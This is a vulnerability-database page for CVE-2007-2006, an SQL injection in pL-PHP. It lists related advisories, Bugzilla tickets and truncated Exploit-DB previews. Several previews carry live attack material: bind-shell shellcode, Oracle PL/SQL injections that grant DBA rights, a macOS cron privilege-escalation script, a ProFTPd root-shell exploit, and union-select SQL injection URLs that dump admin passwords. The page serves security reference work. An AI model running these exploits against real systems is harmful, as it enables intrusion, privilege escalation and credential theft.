CVE-2007-2006
published 2007-04-12CVE-2007-2006: Multiple SQL injection vulnerabilities in login.php in pL-PHP beta 0.9 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) pass…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.03%
59.3th percentile
Multiple SQL injection vulnerabilities in login.php in pL-PHP beta 0.9 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) pass parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpmailer | phpmailer | >= 0 < 5.2.0 | 5.2.0 |
| pl-php | pl-php | <= 0.9_beta | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa7.5HIGH
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
PHPMailer Local file inclusion
ghsa·2024-02-02·CVSS 7.5
CVE-2006-5734 [HIGH] PHPMailer Local file inclusion
PHPMailer Local file inclusion
### Impact
Arbitrary local file inclusion via the `$lang` property, remotely exploitable if host application passes unfiltered user data into that property. The 3 CVEs listed are applications that used PHPMailer that were vulnerable to this problem.
### Patches
It's not known exactly when this was fixed in the host applications, but it was fixed in PHPMailer 5.2.0.
### Workarounds
Filter and validate user-supplied data before use.
### References
https://nvd.nist.gov/vuln/detail/CVE-2006-5734
https://nvd.nist.gov/vuln/detail/CVE-2007-3215
https://nvd.nist.gov/vuln/detail/CVE-2007-2021
Example exploit: https://www.exploit-db.com/exploits/14893
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the
GHSA
GHSA-h78v-7wxx-7wmv: Multiple SQL injection vulnerabilities in login
ghsa_unreviewed·2022-05-01
CVE-2007-2006 [HIGH] GHSA-h78v-7wxx-7wmv: Multiple SQL injection vulnerabilities in login
Multiple SQL injection vulnerabilities in login.php in pL-PHP beta 0.9 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) pass parameter.
Red Hat
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
Multiple Wireshark issues (CVE-2007-0457, CVE-2007-0458, CVE-2007-0459)
vendor_redhat·2007-02-01·CVSS 5.0
CVE-2007-0458 [MEDIUM] Multiple Wireshark issues (CVE-2007-0457, CVE-2007-0458, CVE-2007-0459)
Multiple Wireshark issues (CVE-2007-0457, CVE-2007-0458, CVE-2007-0459)
Unspecified vulnerability in the HTTP dissector in Wireshark (formerly Ethereal) 0.99.3 and 0.99.4 allows remote attackers to cause a denial of service (application crash) via unspecified vectors, a different issue than CVE-2006-5468.
Red Hat
php session extension safe_mode/open_basedir bypass
vendor_redhat·CVSS 4.6
CVE-2007-0905 [MEDIUM] php session extension safe_mode/open_basedir bypass
php session extension safe_mode/open_basedir bypass
PHP before 5.2.1 allows attackers to bypass safe_mode and open_basedir restrictions via unspecified vectors in the session extension. NOTE: it is possible that this issue is a duplicate of CVE-2006-6383.
Statement: We do not consider these to be security issues. For more details see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1
and https://www.php.net/security-note.php
No detection rules found.
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
CactuShop 6.0 - Database Disclosure
exploitdb·2009-12-26
CVE-2007-3061 CactuShop 6.0 - Database Disclosure
CactuShop 6.0 - Database Disclosure
---
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
/_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[�] ~ Note : Forever RevengeHack.Com
[�] CactuShop v6 Database Disclosure Vulnerability
[�] Script: [ CactuShop v6 ]
[�] Language: [ ASP ]
[�] Download: [ http://www.aspindir.com/Goster/3114]
[�] Founder: [ LionTurk - [email protected] }
[�] My Home: [ RevengeHack.com ]
[�]N0T3 : Yeni Ac�klar�m� Bekleyin
###########################################################################
===[ Exploit And Dork ]===
[�] http://[target].com/[path]/database/cactushop6.mdb
[�] CactuShop v6 ASP Shopping Cart �1999-2006 Cactusoft International FZ-LLC & Cactusoft Ltd. All rights reserved.
[�
Exploit-DB
ClipShare Pro 2006-2007 - 'chid' SQL Injection
exploitdb·2008-11-15
CVE-2008-5489 ClipShare Pro 2006-2007 - 'chid' SQL Injection
ClipShare Pro 2006-2007 - 'chid' SQL Injection
---
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
+ =
= Script: clipShare Remote SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= script:http://www.clip-sha
Exploit-DB
Horde Web-Mail 3.x - 'go.php' Remote File Disclosure
exploitdb·2008-01-06
CVE-2006-1260 Horde Web-Mail 3.x - 'go.php' Remote File Disclosure
Horde Web-Mail 3.x - 'go.php' Remote File Disclosure
---
----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ]
Horde Web-Mail Remote File Disclosure
Eugene Minaev [email protected]
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
At first look , this code is not vulnerable and we can only read remote files.
But parse_url is only a set of regular expressions and we can use nullbyte to deceive functi
Exploit-DB
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
exploitdb·2007-08-28
CVE-2007-4604 DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
---
#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
# Thanks To
# bot : sqlscan, hantu_internet, xcart
# chanell : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
if (@ARGV new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;
if ($res !~ /n
Exploit-DB
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
exploitdb·2007-07-26
CVE-2007-3927 IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
---
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168
Exploit-DB
SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service
exploitdb·2007-06-08
CVE-2007-3157 SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service
SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service
---
/* safenet-dos.c
*
* SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS (win32)
* by John Anderson
* mu-b
* - Mar 2006 - June 2007
*
* - Tested on: SafeNet HighAssurance Remote 1.4.0 (Build 12) (win32)
*
* Kernel level (Ring0) DoS in IPv6 support of IPSecDrv.sys
* (causes an infinite loop in searching option headers 0x1000BEB0).
*
* This POC only works on a local subnet since it sends an invalid packet
* and any sensible router will drop it. However, this is exploitable
* remotely with IPv6.
*/
#include
#include
#include
#include
#include
#include
#include
#define IPV4_HDR_LEN 20
#define IPV6_HDR_LEN 40
#define UDP_LEN 16
struct opt
{
u_char nxt_hdr;
u_char opt_len;
};
unsigned long int
lookup (char *hostnam
Exploit-DB
ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)
exploitdb·2007-05-04
CVE-2007-1669 ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)
ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)
---
/*
Exploit for the vulnerability:
Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-Sébastien Guay-Leroux
September 2006
*/
#include
#include
#include
// Structure of a ZOO header
#define ZOO_HEADER_SIZE 0x0000002a
#define ZH_TEXT 0
#define ZH_TAG 20
#define ZH_START_OFFSET 24
#define ZH_NEG_START_OFFSET 28
#define ZH_MAJ_VER 32
#define ZH_MIN_VER 33
#define ZH_ARC_HTYPE 34
#define ZH_ARC_COMMENT 35
#define ZH_ARC_COMMENT_LENGTH 39
#define ZH_VERSION_DATA 41
#define D_DIRENTRY_LENGTH 56
#define D_TAG 0
#define D_TYPE 4
#define D_PACKING_METHOD 5
#define D_NEXT_ENTRY 6
#define D_OFFSET 10
#define D_DATE 14
#define D_TIME 16
#define D_FILE_CRC 18
#define D_ORIGINAL_SIZE 20
#define D_SIZE_N
Exploit-DB
pl-PHP Beta 0.9 - Multiple Vulnerabilities
exploitdb·2007-04-10
CVE-2007-2008 pl-PHP Beta 0.9 - Multiple Vulnerabilities
pl-PHP Beta 0.9 - Multiple Vulnerabilities
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Sec
Exploit-DB
JC URLShrink 1.3.1 - Remote Code Execution
exploitdb·2007-03-30
CVE-2007-1795 JC URLShrink 1.3.1 - Remote Code Execution
JC URLShrink 1.3.1 - Remote Code Execution
---
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}
)_/ \ /
(@
+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+ /*************************__I N F O__**************************\
+ |* *|
+ |* U R L S H R I N K *|
+ |* *|
+ |* Portal: Urlshrink *|
+ |* Version: 1.3.1 *|
+ |* Release: 26-07-2006 *|
+ |* www: www.developers.jccorp.net *|
+ |* Author: Dj7xpl | [email protected] *|
+ |* *|
+ \**************************************************************/
+_______________________________________________________________________________________________________________________+
+
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
PMB Services 3.0.13 - Multiple Remote File Inclusions
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection
exploitdb·2007-02-23
CVE-2006-0549 Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection
Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection
---
#!/usr/bin/perl
#
# Remote Oracle DBMS_METADAT.GET_DDL exploit (9i/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: https://www.securityfocus.com/bid/16287
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Feb 23 12:32:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddl.pl line
Exploit-DB
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
exploitdb·2007-02-22
CVE-2007-0843 Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
---
// source: https://www.securityfocus.com/bid/22664/info
Microsoft Windows is prone to a local information-disclosure vulnerability.
A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer.
/*
Monitors directory changes
(c) 2006-2007 Vladimir Dubrovin, 3APA3A
http://securityvulns.com/
http://securityvulns.ru/
*/
#include
#include
#include
int main(int argc, char *argv[]){
HANDLE hDir;
char buf[1024];
FILE_NOTIFY_INFORMATION * fn;
int read;
WCHAR * action = NULL;
if(argc != 2) {
printf(
"Usage: %s \n"
" Monitor directory changes with all subdirectories\
Exploit-DB
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
exploitdb·2007-02-18
CVE-2006-6563 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
---
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0
Exploit-DB
Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
exploitdb·2007-01-23
CVE-2006-3698 Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
---
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/
select *
from user_role_privs
;
// milw0rm.com [2007-01-23]
Exploit-DB
Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection
exploitdb·2007-01-23
CVE-2006-0586 Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection
Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection
---
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret
* Privileges needed:
*
* - EXECUTE_CATALOG_ROLE
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
USER_NAME VARCHAR2(200);
JOB_NAME VARCHAR2(200);
NEW_JOB BOOLEAN;
v_Return NUMBER;
BEGIN
USER_NAME := 'OWNER';
JOB_NAME := ''' OR ' || USER || '.f1() = 1--';
v_Return := SYS.KUPV$FT.ATTACH_JOB(
USER_NAME => USER_NAME,
JOB_NAME => JOB_NAME,
NEW_JOB => NEW_JOB
);
END;
/
// milw0rm.com [2007-01-23]
Exploit-DB
Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
exploitdb·2007-01-05
CVE-2007-0117 Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
---
#!/usr/bin/ruby
# (c) 2006 LMH (code from the other exploit, porting)
# Kevin Finisterre (crontab rock and roll)
#
# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.
# And works like a charm.
require 'fileutils'
EVIL_COMMANDS = [
"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ",
"echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\
Exploit-DB
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
exploitdb·2007-01-03
CVE-2007-0059 Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
---
#!/usr/bin/ruby
#
# (c) 2006 LMH
# Original scripting and POC by Aviv Raff (http://aviv.raffon.net).
#
# Description:
# Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the
# fake FTP server (required). HTTP server port can be modified but it's
# not recommended. Adjust as necessary.
#
# see http://projects.info-pull.com/moab/MOAB-03-01-2007.html
require 'socket'
require 'fileutils'
require 'webrick'
trap 0, proc {
puts "-- Terminating: #{$$}"
}
REMOTE_HOST = "192.168.1.133" # Modify to match IP address or hostname
REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath)
TARGET_SCRIPT = "on error resume next\r\n" +
"Set c = CreateObject(\"ADODB.Connection\")\r\n
Exploit-DB
LocazoList 2.01a beta5 - 'subcatID' SQL Injection
exploitdb·2007-01-03
CVE-2007-0129 LocazoList 2.01a beta5 - 'subcatID' SQL Injection
LocazoList 2.01a beta5 - 'subcatID' SQL Injection
---
# Title : LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.locazo.net:81
# Dork : "Powered by Locazolist Copyright © 2006"
# $$ : $100
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//main.asp?catid=1&subcatID=[SQL]
Example:
//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-03]
Exploit-DB
Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Local Privilege Escalation
exploitdb·2006-11-16
CVE-2006-6952 Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Local Privilege Escalation
Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Local Privilege Escalation
---
// source: https://www.securityfocus.com/bid/21140/info
Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities.
An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers.
These isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior.
////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
//// Kmxfw.sys
//// Kernel Privilege Esca
Bugzilla
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
bugzilla·2008-10-29·CVSS 6.8
CVE-2008-4775 [MEDIUM] CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin
3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when
register_globals is enabled, allows remote attackers to inject
arbitrary web script or HTML via the db parameter, a different vector
than CVE-2006-6942 and CVE-2007-5977.
References:
http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded
http://www.securityfocus.com/bid/31928
http://secunia.com/advisories/32449
Discussion:
613 (phpMyAdmin): Build on target fedora-4-epel succeeded.
612 (phpMyAdmin): Build on target fedora-5-epel suc
Bugzilla
CVE-2008-1373 cups: overflow in gif image filter
bugzilla·2008-03-20·CVSS 2.6
CVE-2008-1373 [LOW] CVE-2008-1373 cups: overflow in gif image filter
CVE-2008-1373 cups: overflow in gif image filter
It was discovered that GIF parsing code used by CUPS printing system is affected
by similar issue as GIF parsers used by gd / netpbm / tk / SDL_image.
Value of code_size read from GIF image is not properly validate before being
used to initialize table array in gif_read_lzw(), causing a static buffer overflow.
Issue is similar to:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0553 (tk), CVE-2008-0554
(netpbm)
Discussion:
Created attachment 298680
Proposed patch
Similar to fixed used in gd / tk / netpbm / SDL_image.
---
Tracked upstream via: http://www.cups.org/str.php?L2765
---
cups-1.2.12-10.fc7 has been submitted as an update for Fedora 7
---
cups-1.3.6-4.fc8 has been pushed to the Fedora 8 stable repository. If probl
Bugzilla
CVE-2007-4850 php: curl safe mode bypass
bugzilla·2008-03-07·CVSS 2.1
CVE-2007-4850 [LOW] CVE-2007-4850 php: curl safe mode bypass
CVE-2007-4850 php: curl safe mode bypass
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4850
curl/interface.c in the cURL library (aka libcurl) in PHP 5.2.4 and 5.2.5 allows
context-dependent attackers to bypass safe_mode and open_basedir restrictions
and read arbitrary files via a file:// request containing a \x00 sequence, a
different vulnerability than CVE-2006-2563.
Based on change logs, upstream fix is
http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/interface.c?r1=1.62.2.14.2.33&r2=1.62.2.14.2.34&view=patch
Discussion:
NVD statement regarding this flaw and php packages shipped in Red Hat Enterprise
Linux and Red Hat Application Stack is available on the url also mentioned in
the initial comment - http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4850:
Official Statement from Red Hat (1
Bugzilla
CVE-2008-0553 tk: GIF handling buffer overflow
bugzilla·2008-02-05·CVSS 2.6
CVE-2008-0553 [LOW] CVE-2008-0553 tk: GIF handling buffer overflow
CVE-2008-0553 tk: GIF handling buffer overflow
tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
ReadImage function in tkImgGIF.c does not properly check the value of
initialCodeSize value read from GIF image before using it as upper bound during
the initialization of append array. This can result in stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
